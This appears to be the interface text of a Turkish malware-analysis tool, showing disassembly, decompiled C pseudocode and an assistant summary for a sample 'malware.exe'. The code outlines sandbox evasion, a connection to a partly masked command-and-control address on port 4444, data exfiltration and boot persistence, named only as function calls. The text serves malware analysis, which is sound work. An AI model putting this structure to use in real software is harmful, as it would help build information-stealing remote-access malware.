⚙️
malware.exe :: main()
✕
⚙️
decrypt_payload()
✕
🔢
Hex View
✕
⚙️ Disasm
📊 Graph
🔢 Hex
main(int argc, char **argv):
0x00401000
55
push rbp
0x00401001
48 89 e5
mov rbp, rsp
0x00401004
48 83 ec 30
sub rsp, 0x30
0x00401008
48 8d 35 ...
lea rsi, [rip+aAes_key] ; "AES_KEY_X9F2..."
0x0040100F
e8 8c 05 00 00
call decrypt_payload
0x00401014
48 89 45 f8
mov [rbp-0x8], rax ; secret = result
0x00401018
e8 63 07 00 00
call check_vm
0x0040101D
85 c0
test eax, eax
0x0040101F
75 2e
jne loc_40104F
0x00401021
48 8d 3d ...
lea rdi, [rip+aIp] ; "185.244.x.x"
0x00401028
be 5c 11 00 00
mov esi, 0x115c ; port 4444 (C2!)
0x0040102D
e8 ee 09 00 00
call connect_c2 ; 🚨 Command & Control bağlantı
0x00401032
48 8b 7d f8
mov rdi, [rbp-0x8]
0x00401036
e8 d5 0c 00 00
call exfiltrate_data ; 🚨 Veri dışarı sızdırma
0x0040103B
e8 c0 10 00 00
call install_persistence ; 🚨 Boot kayıtı
0x00401040
eb 0d
jmp loc_40104F
loc_40104F:
0x0040104F
b8 00 00 00 00
mov eax, 0
0x00401054
c9
leave
0x00401055
c3
ret
🔓 Decompiler
AI
⟲
⚙
📋
// ANKA Decompiler v3.2.1
// Fonksiyon: main @ 0x401000
// Mimari: x86_64 | Confidence: 98%
int main(int argc, char **argv) {
char *secret;
// Şifre çözme: AES anahtarı sabit
secret = decrypt_payload("AES_KEY_X9F2");
// VM tespiti — sandbox kaçınma
if (check_vm() == 0) {
// 🚨 C2 sunucu bağlantısı
connect_c2("185.244.x.x", 4444);
// 🚨 Veri dışarı gönderme
exfiltrate_data(secret);
// 🚨 Kalıcı kurulum (boot)
install_persistence();
}
return 0;
}
🤖
ANKA Asistan Analizi
Bu dosya InfoStealer + RAT sınıfında bir kötü amaçlı yazılım. 3 kritik davranış tespit edildi:
1. Veri sızdırma (exfiltration)
2. Komuta merkezi (C2) bağlantısı
3. Kalıcı kurulum (persistence)
→ Detaylı rapor için tıklayın